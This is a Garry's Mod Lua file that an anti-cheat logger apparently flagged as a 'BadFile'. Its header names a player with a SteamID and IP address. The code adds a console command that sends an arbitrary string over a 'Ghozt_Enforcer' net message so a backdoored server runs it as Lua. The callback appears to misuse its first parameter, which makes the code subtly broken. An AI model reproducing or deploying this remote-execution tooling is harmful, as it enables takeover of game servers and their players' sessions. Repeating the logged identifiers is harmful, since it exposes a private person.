--[[
	MOD/lua/g_control_enforce.lua
	Niller303 | STEAM_0:1:64607538 <37.128.215.195:27005> | [17-10-13 04:14:09PM]
	===BadFile===
]]

concommand.Add("NH_ServerRunLua", function(args)
	local lua = args;

	net.Start("Ghozt_Enforcer")
		net.WriteString(lua)
	net.SendToServer()
end)